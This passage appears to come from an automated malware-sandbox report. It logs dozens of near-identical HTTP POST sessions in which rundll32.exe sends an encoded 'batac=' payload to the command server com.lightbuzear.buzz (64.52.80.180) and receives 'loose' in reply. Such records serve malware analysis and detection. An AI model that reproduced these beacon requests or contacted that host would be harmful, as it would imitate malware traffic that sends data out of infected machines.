              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:00 UTC54INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:00 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:00 UTC54INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.224920464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:00 UTC54OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:00 UTC54OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:01 UTC55INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:01 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:01 UTC56INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.224920564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:01 UTC56OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:01 UTC56OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:02 UTC57INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:02 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:02 UTC57INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.224920664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:03 UTC57OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:03 UTC58OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:03 UTC59INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:03 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:03 UTC59INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.224920764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:04 UTC59OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:04 UTC59OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:04 UTC60INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:04 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:04 UTC61INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.224920864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:05 UTC61OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:05 UTC61OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:05 UTC62INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:05 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:05 UTC62INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.224920964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:06 UTC62OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:06 UTC63OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:06 UTC64INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:06 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:06 UTC64INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.224921064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:07 UTC64OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:07 UTC64OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:07 UTC65INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:07 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:07 UTC65INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.224921164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:08 UTC65OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:08 UTC66OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:09 UTC67INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:08 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:09 UTC67INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.224917664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:29 UTC8OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:29 UTC8OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:30 UTC9INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:30 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:30 UTC9INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.224921264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:09 UTC67OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:09 UTC67OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:10 UTC69INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:09 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:10 UTC69INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.224921364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:10 UTC69OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:10 UTC69OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
